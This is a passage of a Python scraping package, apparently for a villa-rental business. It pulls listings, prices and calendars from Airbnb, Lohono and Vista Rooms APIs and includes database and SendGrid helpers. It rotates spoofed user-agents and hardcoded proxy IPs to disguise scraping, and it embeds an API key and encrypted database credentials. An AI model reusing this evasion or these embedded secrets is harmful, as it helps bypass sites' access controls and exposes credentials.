pass_enc = b'gAAAAABfQPr4iwH0c5pxjI4XfV-uT-pBt9tKfQgFJEfjTcTIjwipeN4tI_bG-TtHoamosKEuFOldevYPi-3usIj1ZDSrb-zsXg=='
database_enc = b'gAAAAABgU5oarKoMuMj5EYPHf59SSfalqJ1_vtsGjbk4Gepefkr5dhTnZg1KVSmt6Rln02B5SOJf-N9dzbA6Q47uJbZ-xNrJdQ=='
elif database=="dev":
host_enc = b'gAAAAABgU5RRIJqGSTQhaupb_rwblmtCTjl6Id6fa1JMsZQac6i9eaUtoBoglK92yuSCGiTaIadtjrwxmK5VMS2cM6Po-SWMpQ=='
user_enc = b'gAAAAABgU5QmKmvNsS7TC2tz66e3S40CSiNF8418N6ANGFn6D_RhP8fd4iQRML3uk9WnDlDAtYHpGjstwgpKH8YJ347xZHQawA=='
pass_enc = b'gAAAAABgU5Rf1piAvyT_p5LRd0YJheFT2Z9W75R4b2MUA1o1-O4Vn2Xw7R-1bWLx4EhYUrRZ6_ajI8DCgLVULZZdVSWxG6OvCw=='
database_enc = b'gAAAAABgU5SLKYwupyp_nrcSzGYcwDkkKKxGjmvEpULZV2MmKGDgXCefa2WvINUBrCCmBeyt9GcpzBQQSE9QN8azsDSItdTa5Q=='
else:
raise ValueError("Invalid Database, pick either of the 3 - ('main','dev','vista')")
myServer = cipher_suite.decrypt(host_enc).decode("utf-8")
myUser = cipher_suite.decrypt(user_enc).decode("utf-8")
myPwd = cipher_suite.decrypt(pass_enc).decode("utf-8")
db = cipher_suite.decrypt(database_enc).decode("utf-8")
myConnection = pymysql.connect(host=myServer,user=myUser,password=myPwd,db=db)
return myConnection
"""# Helper Functions
```
next_weekday()
mock_user_agent()
mock_proxy()
earth_distance(lat1,lon1,lat2,lon2)
```
"""
# Get the next weekday ( 0=monday , 1 = tuesday ... )
def next_weekday(weekday=0, d=datetime.date.today()):
days_ahead = weekday - d.weekday()
if days_ahead <= 0: # Target day already happened this week
days_ahead += 7
return d + datetime.timedelta(days_ahead)
# default - next monday
# gives a random user-agent to use in the API call
def mock_user_agent():
users = ["Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41",
"Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00",
"Opera/9.60 (Windows NT 6.0; U; en) Presto/2.1.1",
"Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)"]
return users[random.randint(0,7)]
# Gives a 'proxies' object for a 'requests' call
def mock_proxy():
proxies_list = ["45.72.30.159:80",
"45.130.255.156:80",
"193.8.127.117:80",
"45.130.255.147:80",
"193.8.215.243:80",
"45.130.125.157:80",
"45.130.255.140:80",
"45.130.255.198:80",
"185.164.56.221:80",
"45.136.231.226:80"]
proxy = proxies_list[random.randint(0,9)]
proxies = {
"http": proxy,
"https": proxy
}
return proxies
# Arial distance between 2 pairs of coordinates
def earth_distance(lat1,lon1,lat2,lon2):
# Radius of the earth
R = 6373.0
lat1 = math.radians(lat1)
lon1 = math.radians(lon1)
lat2 = math.radians(lat2)
lon2 = math.radians(lon2)
dlon = lon2 - lon1
dlat = lat2 - lat1
#Haversine formula
a = math.sin(dlat / 2)**2 + math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2)**2
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
distance = R * c
return distance
def to_fancy_date(date):
tmstmp = pd.to_datetime(date)
day = tmstmp.day
if 4 <= day <= 20 or 24 <= day <= 30:
suffix = "th"
else:
suffix = ["st", "nd", "rd"][day % 10 - 1]
return f"{tmstmp.day}{suffix} {tmstmp.month_name()} {tmstmp.year}" | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/common.py | common.py |
import requests
import json
import pandas as pd
import datetime
from .common import *
"""# AirBnb"""
airbnb_home_types = ['Entire home apt','Hotel room','Private room', 'Shared room']
airbnb_imp_amenities = [5,4,16,7,9,12]
#AC, Wifi , Breakfast, Parking, Pool, Pets (Not in order)
# Airbnb Search API
def airbnb_search_api(place_id = "ChIJRYHfiwkB6DsRWIbipWBKa2k", city = "", state = "", min_price = 4000, max_price=50000, min_bedrooms=1, home_type=airbnb_home_types, items_per_grid = 50, amenities = [], items_offset = 0):
home_type = [item.replace(" ","%20") for item in home_type]
home_type = ["Entire%20home%2Fapt" if x=="Entire%20home%20apt" else x for x in home_type]
home_type_filter = "%22%2C%22".join(home_type)
amenities = [str(item) for item in amenities]
amenities_filter = "%2C".join(amenities)
url = f"https://www.airbnb.co.in/api/v3/ExploreSearch?locale=en-IN&operationName=ExploreSearch¤cy=INR&variables=%7B%22request%22%3A%7B%22metadataOnly%22%3Afalse%2C%22version%22%3A%221.7.8%22%2C%22itemsPerGrid%22%3A{items_per_grid}%2C%22tabId%22%3A%22home_tab%22%2C%22refinementPaths%22%3A%5B%22%2Fhomes%22%5D%2C%22source%22%3A%22structured_search_input_header%22%2C%22searchType%22%3A%22filter_change%22%2C%22mapToggle%22%3Afalse%2C%22roomTypes%22%3A%5B%22{home_type_filter}%22%5D%2C%22priceMin%22%3A{min_price}%2C%22priceMax%22%3A{max_price}%2C%22placeId%22%3A%22{place_id}%22%2C%22itemsOffset%22%3A{items_offset}%2C%22minBedrooms%22%3A{min_bedrooms}%2C%22amenities%22%3A%5B{amenities_filter}%5D%2C%22query%22%3A%22{city}%2C%20{state}%22%2C%22cdnCacheSafe%22%3Afalse%2C%22simpleSearchTreatment%22%3A%22simple_search_only%22%2C%22treatmentFlags%22%3A%5B%22simple_search_1_1%22%2C%22oe_big_search%22%5D%2C%22screenSize%22%3A%22large%22%7D%7D&extensions=%7B%22persistedQuery%22%3A%7B%22version%22%3A1%2C%22sha256Hash%22%3A%22274161d4ce0dbf360c201612651d5d8f080d23820ce74da388aed7f9e3b00c7f%22%7D%7D"
#url = f"https://www.airbnb.co.in/api/v3/ExploreSearch?locale=en-IN&operationName=ExploreSearch¤cy=INR&variables=%7B%22request%22%3A%7B%22metadataOnly%22%3Afalse%2C%22version%22%3A%221.7.8%22%2C%22itemsPerGrid%22%3A20%2C%22roomTypes%22%3A%5B%22Entire%20home%2Fapt%22%5D%2C%22minBedrooms%22%3A0%2C%22source%22%3A%22structured_search_input_header%22%2C%22searchType%22%3A%22pagination%22%2C%22tabId%22%3A%22home_tab%22%2C%22mapToggle%22%3Afalse%2C%22refinementPaths%22%3A%5B%22%2Fhomes%22%5D%2C%22ib%22%3Atrue%2C%22amenities%22%3A%5B4%2C5%2C7%2C9%2C12%2C16%5D%2C%22federatedSearchSessionId%22%3A%22e597713a-7e46-4d10-88e7-3a2a9f15dc8d%22%2C%22placeId%22%3A%22ChIJM6uk0Jz75zsRT1nlkg6PwiQ%22%2C%22itemsOffset%22%3A20%2C%22sectionOffset%22%3A2%2C%22query%22%3A%22Karjat%2C%20Maharashtra%22%2C%22cdnCacheSafe%22%3Afalse%2C%22simpleSearchTreatment%22%3A%22simple_search_only%22%2C%22treatmentFlags%22%3A%5B%22simple_search_1_1%22%2C%22oe_big_search%22%5D%2C%22screenSize%22%3A%22large%22%7D%7D&extensions=%7B%22persistedQuery%22%3A%7B%22version%22%3A1%2C%22sha256Hash%22%3A%22274161d4ce0dbf360c201612651d5d8f080d23820ce74da388aed7f9e3b00c7f%22%7D%7D"
payload = {}
headers = {
'authority': 'www.airbnb.co.in',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'device-memory': '4',
'x-airbnb-graphql-platform-client': 'apollo-niobe',
#'x-csrf-token': 'V4$.airbnb.co.in$lHdA3kStJv0$yEvcPM_C6eeUUHkQuYEdGFWrZreA5ui1e4A-pMzDFI=',
'x-airbnb-api-key': 'd306zoyjsyarp7ifhu67rjxn52tv0t20',
'x-csrf-without-token': '4',
'user-agent': mock_user_agent(),
'viewport-width': '1600',
'content-type': 'application/json',
'accept': '*/*',
'dpr': '1',
'ect': '4g',
'x-airbnb-graphql-platform': 'web',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
# 'referer': f'https://www.airbnb.co.in/s/{city}--{state}/homes?tab_id=home_tab&refinement_paths%5B%5D=%2Fhomes&adults=2&source=structured_search_input_header&search_type=filter_change&map_toggle=false&room_types%5B%5D=Entire%20home%2Fapt&price_min=4221&place_id={place_id}',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
}
response = requests.get(url, headers=headers, data = payload)
#response = json.loads(response.text.encode('utf8'))
return response
# Airbnb Calendar API
def airbnb_calendar_api(listing_id,start_month=9,start_year=2020,bev='1600684519_NDg5ZGY1ZDQ4YjNk',month_count=4):
url = f"https://www.airbnb.co.in/api/v3/PdpAvailabilityCalendar?operationName=PdpAvailabilityCalendar&locale=en-IN¤cy=INR&variables=%7B%22request%22%3A%7B%22count%22%3A{month_count}%2C%22listingId%22%3A%22{listing_id}%22%2C%22month%22%3A{start_month}%2C%22year%22%3A{start_year}%7D%7D&extensions=%7B%22persistedQuery%22%3A%7B%22version%22%3A1%2C%22sha256Hash%22%3A%22b94ab2c7e743e30b3d0bc92981a55fff22a05b20bcc9bcc25ca075cc95b42aac%22%7D%7D"
payload = {}
headers = {
'authority': 'www.airbnb.co.in',
#'pragma': 'no-cache',
#'cache-control': 'no-cache',
#'device-memory': '8',
'x-airbnb-graphql-platform-client': 'minimalist-niobe',
#'x-csrf-token': 'V4$.airbnb.co.in$lHdA3kStJv0$yEvcPMB_C6eeUUHkQuYEdGFWrZreA5ui1e4A-pMzDFI=',
'x-airbnb-api-key': 'd306zoyjsyarp7ifhu67rjxn52tv0t20',
#'x-csrf-without-token': '1',
'user-agent': mock_user_agent(),
'viewport-width': '1600',
'content-type': 'application/json',
'accept': '*/*',
'dpr': '1',
'ect': '4g',
'x-airbnb-graphql-platform': 'web',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.airbnb.co.in/rooms/{listing_id}?adults=2&source_impression_id=p3_1598719581_vge1qn5YJ%2FXWgUKg&check_in=2020-10-01&guests=1',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
'cookie': f'bev={bev};'
}
response = requests.request("GET", url, headers=headers, data = payload)
response = json.loads(response.text.encode('utf8'))
return response
#Airbnb search DataFrame
def airbnb_search(place_ids = ["ChIJRYHfiwkB6DsRWIbipWBKa2k"], max_iters = 5, min_price=4000,max_price=200000, home_type=[],amenities=[], min_bedrooms=1 ):
all_items = []
for place_id in place_ids:
counter = 1
offset = 0
while counter<=max_iters:
print(f"Round {counter} for {place_id}")
counter+=1
response = airbnb_search_api(place_id = place_id, min_price = min_price ,max_price=max_price, min_bedrooms=min_bedrooms,home_type=home_type,amenities=amenities, items_offset = offset)
offset += 50
if not response['data']['dora']['exploreV3']['sections']:
break
else:
for sections in response['data']['dora']['exploreV3']['sections']:
if 'listing' in sections['items'][0].keys():
all_items.extend(sections['items'])
items_df = pd.DataFrame([item['listing'] for item in all_items])
prices_df = pd.DataFrame([item['pricingQuote'] for item in all_items])
items_df[['canInstantBook','weeklyPriceFactor','monthlyPriceFactor','priceDropDisclaimer','priceString','rateType']] = prices_df[['canInstantBook','weeklyPriceFactor','monthlyPriceFactor','priceDropDisclaimer','priceString','rateType']]
return_obj = items_df[['id','name','roomAndPropertyType','reviews','avgRating','starRating','reviewsCount','amenityIds','previewAmenityNames','bathrooms','bedrooms','city','lat','lng','personCapacity','publicAddress','pictureUrl','pictureUrls','isHostHighlyRated','isNewListing','isSuperhost','canInstantBook','weeklyPriceFactor','monthlyPriceFactor','priceDropDisclaimer','priceString','rateType']]
return_obj = return_obj.drop_duplicates('id')
return return_obj
# Airbnb Calendar DataFrame
def airbnb_calendar(listing_id,start_month=datetime.datetime.today().month,start_year=datetime.datetime.today().year):
api_response = airbnb_calendar_api(listing_id,start_month,start_year)
all_months = [month['days'] for month in api_response['data']['merlin']['pdpAvailabilityCalendar']['calendarMonths']]
all_days=[]
for month in all_months:
all_days.extend(month)
all_days = pd.DataFrame(all_days)
all_days['price'] = [item['localPriceFormatted'][1:].replace(",","") for item in all_days['price'].values]
all_days['calendarDate'] = pd.to_datetime(all_days['calendarDate'])
all_days['listing_id'] = listing_id
all_days = all_days.astype({'price':'int32'})
return all_days
# Get Occupancy data for a listing id
def airbnb_occupancy(listing_id):
clndr = airbnb_calendar(listing_id=listing_id,start_month=datetime.datetime.today().month,start_year=datetime.datetime.today().year)
clndr = clndr.set_index('calendarDate')
clndr_monthly = clndr.groupby(pd.Grouper(freq='M')).mean()
clndr_monthly['month-year'] = [str(item.month_name())+" "+str(item.year) for item in clndr_monthly.index]
clndr_monthly = clndr_monthly.set_index('month-year')
clndr_monthly['occupancy'] = 1-clndr_monthly['available']
occupancy = clndr_monthly['occupancy'].to_json()
available = clndr[clndr['available']==True].index
blocked = clndr[clndr['available']==False].index
available = [str(item.date()) for item in available]
blocked = [str(item.date()) for item in blocked]
return_obj = {
"listing_id": listing_id,
"monthly_occupancy" : occupancy,
"blocked_dates" : blocked,
"available_dates": available
}
return return_obj | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/airbnb.py | airbnb.py |
import requests
import json
import pandas as pd
from .common import *
# List of all lohono locations
def lohono_locations():
locations = ['india-alibaug','india-goa','india-lonavala','india-karjat']
return locations
# lohono Search API wrapper
def lohono_search_api(location_slug="india-goa",page=1):
url = "https://www.lohono.com/api/property"
params = {
'location_slug': location_slug,
'page': page
}
payload = {}
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.lohono.com/villas/india/{ location_slug.split("-")[-1] }',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
response = requests.get(url, headers=headers, data = payload, params=params)
search_data = json.loads(response.text.encode('utf8'))
return search_data
# lohono listing API wrapper
def lohono_listing_api(slug='prop-villa-magnolia-p5sp'):
url = f"https://www.lohono.com/api/property/{slug}"
payload = {}
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://www.lohono.com/villas/india/goa/prop-fonteira-vaddo-a-C6Cn',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8'
}
response = requests.get(url, headers=headers, data = payload)
listing_data = json.loads(response.text.encode('utf8'))
return listing_data['response']
# lohono Pricing API wrapper
def lohono_pricing_api(slug,checkin,checkout,adult=2,child=0):
url = f"https://www.lohono.com/api/property/{slug}/price"
payload = "{\"property_slug\":\""+slug+"\",\"checkin_date\":\""+str(checkin)+"\",\"checkout_date\":\""+str(checkout)+"\",\"adult_count\":"+str(adult)+",\"child_count\":"+str(child)+",\"coupon_code\":\"\",\"price_package\":\"\",\"isEH\":false}"
headers = {
'authority': 'www.lohono.com',
'pragma': 'no-cache',
'cache-control': 'no-cache',
'accept': 'application/json',
'user-agent': mock_user_agent(),
'content-type': 'application/json',
'origin': 'https://www.lohono.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': f'https://www.lohono.com/villas/india/goa/{slug}?checkout_date={checkout}&adult_count={adult}&checkin_date={checkin}',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
}
response = requests.post(url, headers=headers, data = payload)
pricing_data = json.loads(response.text.encode('utf8'))
return pricing_data
# Basic details from the search API
def lohono_search(location_slugs=lohono_locations()):
page = 1
all_properties = []
for location_slug in location_slugs:
while True:
print(f"page{ page } for {location_slug}")
search_response = lohono_search_api(location_slug,page)
all_properties.extend(search_response['response']['properties'])
if search_response['paginate']['total_pages'] == page:
break
page += 1
return pd.DataFrame(all_properties)
# All details for all the listings
def lohono_master_dataframe():
search_data = lohono_search()
slugs = search_data['property_slug'].values
all_properties = []
for slug in slugs:
print(f"getting {slug}")
listing_raw = lohono_listing_api(slug)
all_properties.append(listing_raw)
all_properties = pd.DataFrame(all_properties)
all_properties['amenities'] = [[amenity['name'] for amenity in amenities] for amenities in all_properties['amenities']]
all_properties['price'] = search_data['rate']
all_properties['search_name'] = search_data['name']
return all_properties | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/lohono.py | lohono.py |
import requests
import json
import pandas as pd
from sendgrid.helpers.mail import Mail
from sendgrid import SendGridAPIClient
from .common import *
# SQL query on the SS database (ONLY SELECT) - returns a dataframe
def sql_query(query,cypher_key):
myConnection = db_connection(cypher_key,database="main")
if query.split(' ')[0] != 'SELECT':
print("Error. Please only use non destructive (SELECT) queries.")
return "Please only use non destructive (SELECT) queries."
response_df = pd.io.sql.read_sql(query, con=myConnection)
myConnection.close()
return response_df
# to execute destructive queries
def sql_query_destructive(query,cypher_key):
con = db_connection(cypher_key,database="main")
try:
with con.cursor() as cur:
cur.execute(query)
con.commit()
finally:
con.close()
class dev:
def sql_query(query,cypher_key):
myConnection = db_connection(cypher_key,database="dev")
response_df = pd.io.sql.read_sql(query, con=myConnection)
myConnection.close()
return response_df
def sql_query_destructive(query,cypher_key):
con = db_connection(cypher_key,database="dev")
try:
with con.cursor() as cur:
cur.execute(query)
con.commit()
finally:
con.close()
class aws:
def sql_query(query,cypher_key):
myConnection = db_connection(cypher_key,database="main")
if query.split(' ')[0] != 'SELECT':
print("Error. Please only use non destructive (SELECT) queries.")
return "Please only use non destructive (SELECT) queries."
response_df = pd.io.sql.read_sql(query, con=myConnection)
myConnection.close()
return response_df
# to execute destructive queries
def sql_query_destructive(query,cypher_key):
con = db_connection(cypher_key,database="main")
try:
with con.cursor() as cur:
cur.execute(query)
con.commit()
finally:
con.close()
# Get the status for all the dates for a list of homes
def get_calendar(listing_ids,check_in,check_out):
parsed_listing_ids = str(listing_ids)[1:-1]
parsed_listing_ids = parsed_listing_ids.replace("'","").replace(" ","")
url = "https://www.saffronstays.com/calender_node.php"
params={
"listingList": parsed_listing_ids,
"checkIn":check_in,
"checkOut":check_out
}
payload = {}
headers= {}
response = requests.get(url, headers=headers, data = payload,params=params)
response = json.loads(response.text.encode('utf8'))
return response
# SS Facebook catalogue (a list of currently live listings)
def ss_fb_catalogue():
url = "https://www.saffronstays.com/items_catalogue.php"
response = requests.get(url)
response_data = response.text.encode('utf8')
csv_endpoint = str(response_data).split('`')[1]
csv_download_url = "https://www.saffronstays.com/"+csv_endpoint
ss_data = pd.read_csv(csv_download_url)
return ss_data
# list of emails and preheader names, update with yours
def sendgrid_email(TEMPLATE_ID,EMAILS,api_key,PAYLOAD={},from_email='[email protected]',from_name='SaffronStays'):
""" Send a dynamic email to a list of email addresses
:returns API response code
:raises Exception e: raises an exception """
# create Mail object and populate
message = Mail(
from_email=(from_email,from_name),
to_emails=EMAILS
)
# pass custom values for our HTML placeholders
message.dynamic_template_data = PAYLOAD
message.template_id = TEMPLATE_ID
# create our sendgrid client object, pass it our key, then send and return our response objects
try:
sg = SendGridAPIClient(api_key)
response = sg.send(message)
code, body, headers = response.status_code, response.body, response.headers
print(f"Response code: {code}")
print(f"Response headers: {headers}")
print(f"Response body: {body}")
print("Dynamic Messages Sent!")
return str(response.status_code)
except Exception as e:
print("Error: {0}".format(e))
return "Error: {0}".format(e) | 73e4d8e848405a88f444cff1c9dbc5b8 | /73e4d8e848405a88f444cff1c9dbc5b8-0.5-py3-none-any.whl/sstools/saffronstays.py | saffronstays.py |
import requests
import json
import pandas as pd
import datetime
from IPython.display import clear_output
import time
from sqlalchemy.exc import IntegrityError
import math
from .common import *
# Return list of all locations
def vista_locations():
locations = ["lonavala, maharashtra",
"goa, goa",
"alibaug, maharashtra",
"nainital, uttarakhand",
"dehradun", "uttarakhand",
"chail, himanchal-pradesh",
"manali, himachal-pradesh",
"shimla, himanchal%20pradesh",
"ooty, tamil%20nadu",
"coorg, karnataka",
"dehradun, uttarakhand",
"jaipur, rajasthan",
"udaipur, rajasthan",
"mahabaleshwar, maharashtra",
"nashik, maharashtra",
"gangtok, sikkim",
"gurgaon, haryana",
"vadodara, gujarat",
"kashmir, jammu",
]
return locations
# Wrapper on the search API
def vista_search_api(search_type='city',location="lonavala,%20maharashtra",checkin="",checkout="",guests=2,adults=2,childs=0,page_no=1):
url = "https://searchapi.vistarooms.com/api/search/getresults"
param={
}
payload = {
"city": location,
"search_type": "city",
"checkin": checkin,
"checkout": checkout,
"total_guests": guests,
"adults": adults,
"childs": childs,
"page": page_no,
"min_bedrooms": 1,
"max_bedrooms": 30,
"amenity": [],
"facilities": [],
"price_start": 1000,
"price_end": 5000000,
"sort_by_price": ""
}
headers = {}
response = requests.post(url, params=param, headers=headers, data=payload)
search_data = json.loads(response.text.encode('utf8'))
return search_data
# Wrapper on the listing API
def vista_listing_api(slug='the-boulevard-villa',guests=2,checkin=datetime.date.today()+datetime.timedelta(1), checkout=datetime.date.today()+datetime.timedelta(2),
guest=3,adult=3,child=0):
url = "https://v3api.vistarooms.com/api/single-property"
param={
'slug': slug,
'checkin': checkin,
'checkout': checkout,
'guest': guest,
'adult': adult,
'child': child
}
payload = {}
headers = {
}
response = requests.get(url, params=param, headers=headers, data = payload)
property_deets = json.loads(response.text.encode('utf8'))
return property_deets
# Wrapper on the listing extra details API
def vista_listing_other_details_api(id=107):
url = "https://v3api.vistarooms.com/api/single-property-detail"
param={
'id': id,
}
payload = {}
headers = {
}
response = requests.get(url, params=param, headers=headers, data = payload)
property_other_deets = json.loads(response.text.encode('utf8'))
return property_other_deets
# Wrapper on the price calculator
def vista_price_calculator_api(property_id='710', checkin=datetime.date.today()+datetime.timedelta(1), checkout = datetime.date.today()+datetime.timedelta(2), guest = 2, adult = 2, child = 0):
if type(checkin)==str:
checkin = datetime.datetime.strptime(checkin,'%Y-%m-%d')
checkout = datetime.datetime.strptime(checkout,'%Y-%m-%d')
url = "https://v3api.vistarooms.com/api/price-breakup"
param={
'property_id': property_id,
'checkin': checkin,
'checkout': checkout,
'guest': guest,
'adult': adult,
'child': child,
}
payload = {}
headers = {
}
response = requests.get(url, params=param, headers=headers, data = payload)
pricing_deets = json.loads(response.text.encode('utf8'))
return pricing_deets
# Wrapper on the avalability (Blocked dates)
def vista_availability_api(property_id=119):
url = "https://v3api.vistarooms.com/api/calendar/property/availability"
params={
"property_id":property_id
}
payload = {}
headers = {
}
response = requests.get(url, headers=headers, data = payload, params=params)
calendar = json.loads(response.text.encode('utf8'))
return calendar
# Gives a json response for basic listing data for the list of locations
def vista_search_locations_json(locations=["lonavala,%20maharashtra"],guests=2,get_all=False,wait_time=10):
# Empty list to append (extend) all the data
properties = []
if get_all:
locations = vista_locations()
# Outer loop - for each location
for location in locations:
try:
page_no = 1
# Inner Loop - for each page in location ( acc to the Vista Search API )
while True:
clear_output(wait=True)
print(f"Page {page_no} for {location.split('%20')[0]} ")
# Vista API call (search)
search_data = vista_search_api(location=location,guests=guests,page_no=page_no)
# Break when you reach the last page for a location
if not 'data' in search_data.keys():
break
if not search_data['data']['properties']:
break
properties.extend(search_data['data']['properties'])
page_no += 1
time.sleep(wait_time)
except:
pass
return properties
# Retruns a DATAFRAME for the above functions & **DROPS DUPLICATES (always use this for analysis)
def vista_search_locations(locations=["lonavala,%20maharashtra"],guests=2,get_all=False,wait_time=10):
villas = vista_search_locations_json(locations=locations, guests=guests,get_all=get_all,wait_time=wait_time)
villas = pd.DataFrame(villas)
villas = villas.drop_duplicates('id')
return villas
# Returns a JSON with the listing details
def vista_listing(slug='the-boulevard-villa',guests=2,checkin=datetime.date.today()+datetime.timedelta(1), checkout=datetime.date.today()+datetime.timedelta(2)):
print("Fetching ",slug)
# Vista API call (listing)
property_deets = vista_listing_api(slug=slug,guests=guests,checkin=checkin, checkout=checkout)
# Get lat and long (diff API call)
lat_long = vista_listing_other_details_api(property_deets['data']['property_detail']['id'])['data']['location']
# Get pricing for various durations
weekday_pricing = vista_price_calculator(property_deets['data']['property_detail']['id'],checkin=next_weekday(),checkout=next_weekday()+datetime.timedelta(1))
weekend_pricing = vista_price_calculator(property_deets['data']['property_detail']['id'],checkin=next_weekday(5),checkout=next_weekday(5)+datetime.timedelta(1))
entire_week_pricing = vista_price_calculator(property_deets['data']['property_detail']['id'],checkin=next_weekday(),checkout=next_weekday()+datetime.timedelta(7))
entire_month_pricing = vista_price_calculator(property_deets['data']['property_detail']['id'],checkin=next_weekday(),checkout=next_weekday()+datetime.timedelta(30))
# Add the extra fields in response (JSON)
property_deets['data']['slug'] = slug
property_deets['data']['lat'] = lat_long['latitude']
property_deets['data']['lon'] = lat_long['longitude']
property_deets['data']['checkin_date'] = checkin
property_deets['data']['checkout_date'] = checkout
property_deets['data']['weekday_pricing'] = weekday_pricing
property_deets['data']['weekend_pricing'] = weekend_pricing
property_deets['data']['entire_week_pricing'] = entire_week_pricing
property_deets['data']['entire_month_pricing'] = entire_month_pricing
property_deets['data']['price_per_room'] = property_deets['data']['price']['amount_to_be_paid']/property_deets['data']['property_detail']['number_of_rooms']
return property_deets['data']
# Calculates the price for a duration (if unavailable, will automatically look for the next available dates) % Recursive function
def vista_price_calculator(property_id, checkin=datetime.date.today()+datetime.timedelta(1), checkout = datetime.date.today()+datetime.timedelta(2), guest = 2, adult = 2, child = 0, depth=0):
date_diff = (checkout-checkin).days
# Set the exit condition for the recursion depth ( to avoid an endless recursion -> slowing down the scripts )
if date_diff < 7:
depth_lim = 15
next_hop = 7
elif date_diff >= 7 and date_diff < 29:
depth_lim = 7
next_hop = 7
else:
depth_lim = 5
next_hop = date_diff
if depth==depth_lim:
return f"Villa Probably Inactive, checked till {checkin}"
if type(checkin)==str:
checkin = datetime.datetime.strptime(checkin,'%Y-%m-%d')
checkout = datetime.datetime.strptime(checkout,'%Y-%m-%d')
# Vista API call (Calculation)
pricing = vista_price_calculator_api(property_id=property_id, checkin=checkin, checkout=checkout, guest=guest, adult=adult, child=child)
if 'error' in pricing.keys():
# Recursion condition (Call self with next dates in case the dates are not available)
if pricing['error'] == 'Booking Not Available for these dates':
next_checkin = checkin + datetime.timedelta(next_hop)
next_chekout = checkout + datetime.timedelta(next_hop)
next_pricing = vista_price_calculator(property_id,checkin=next_checkin ,checkout=next_chekout,depth=depth+1)
return next_pricing
# For other errors (Like invalid listing ID)
else:
return pricing['error']
return next_pricing
else:
return pricing['data']['price']
# Uses a list of slugs to generate a master DATAFRAME , this contains literally everything, ideal for any analysis on Vista
def vista_master_dataframe(slugs=(['vista-greenwoods-five-villa','maison-calme-villa','vista-greenwoods-four-villa','mehta-mansion','villa-maira'])):
total_slugs = len(slugs)
temp_progress_counter = 0
villas_deets = []
for slug in slugs:
try:
villa_deets = vista_listing(slug=slug)
villas_deets.append(villa_deets)
villas_df = pd.DataFrame(villas_deets)
temp_progress_counter += 1
clear_output(wait=True)
print("Done ",int((temp_progress_counter/total_slugs)*100),"%")
except:
pass
prop_detail_df = pd.DataFrame(list(villas_df['property_detail']))
agent_details_df = pd.DataFrame(list(villas_df['agent_details']))
price_df = pd.DataFrame(list(villas_df['price']))
literally_all_deets = pd.concat([prop_detail_df,villas_df,price_df,agent_details_df], axis=1)
literally_all_deets = literally_all_deets.drop(['property_detail','mini_gallery', 'base_url',
'agent_details', 'house_rule_pdf', 'mini_gallery_text',
'seo','number_extra_guest', 'additionalcost',
'days', 'min_occupancy', 'max_occupancy', 'amount_to_be_paid','total_guest',
'extra_adult', 'extra_child', 'extra_adult_cost', 'extra_child_cost',
'per_person','price','checkin_date','checkout_date','total_price','agent_short_words'], axis = 1)
literally_all_deets['amenities'] = [[amenity['name'] for amenity in amenities] for amenities in literally_all_deets['amenities']]
literally_all_deets['weekday_pricing_value'] = [wkdpr if type(wkdpr)==str else wkdpr['amount_to_be_paid'] for wkdpr in literally_all_deets['weekday_pricing']]
literally_all_deets['weekend_pricing_value'] = [wkdpr if type(wkdpr)==str else wkdpr['amount_to_be_paid'] for wkdpr in literally_all_deets['weekend_pricing']]
literally_all_deets['entire_week_pricing_value'] = [wkdpr if type(wkdpr)==str else wkdpr['amount_to_be_paid'] for wkdpr in literally_all_deets['entire_week_pricing']]
literally_all_deets['entire_month_pricing_value'] = [wkdpr if type(wkdpr)==str else wkdpr['amount_to_be_paid'] for wkdpr in literally_all_deets['entire_month_pricing']]
return literally_all_deets
# Takes 2 lists of listings (Old and New) and only responds with the Dataframe of the newly added listings
def added_villas_dataframe(old_slugs,new_slugs):
added_slugs = list(set(new_slugs).difference(set(old_slugs)))
added_villas = []
if added_slugs:
added_villas = vista_master_dataframe(added_slugs)
return added_villas
# Non Desctructive SQL QUERY - Try "SELECT * FROM VISTA_MASTER"
def vista_sql_query(query,cypher_key):
# Returns a daframe object of the query response
myConnection = db_connection(cypher_key,database="vista")
